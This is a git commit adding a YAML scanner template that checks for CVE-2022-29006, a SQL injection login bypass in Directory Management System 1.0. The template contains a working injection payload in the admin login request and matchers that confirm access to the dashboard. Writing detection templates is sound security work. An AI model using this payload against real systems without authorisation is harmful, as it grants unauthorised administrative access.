Merge pull request #5280 from TenBird-1/CREATE-CVE-2022-29006

CREATE CVE-2022-29006
2022-09-02 11:14:10 +05:30 · 2022-09-02 11:14:10 +05:30 · bc7cb07a1f
parent e75d0d04dc 0246db3d84
commit bc7cb07a1f
1 changed files with 45 additions and 0 deletions
--- a/cves/2022/CVE-2022-29006.yaml
+++ b/cves/2022/CVE-2022-29006.yaml
@ -0,0 +1,45 @@
+id: CVE-2022-29006
+
+info:
+  name: Directory Management System  1.0 - SQLi Authentication Bypass
+  author: TenBird
+  severity: critical
+  description: |
+    Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.
+  reference:
+    - https://www.exploit-db.com/exploits/50370
+    - https://phpgurukul.com/directory-management-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29006
+  classification:
+    cve-id: CVE-2022-29006
+  metadata:
+    verified: true
+  tags: cve,cve2022,sqli,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST /admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username=admin' or '1'='1&password=1&login=login
+
+      - |
+        GET /admin/dashboard.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'DMS || Dashboard'
+          - 'DMS Admin'
+          - 'Admin Profile'
+        condition: and
+
+      - type: status
+        status:
+          - 200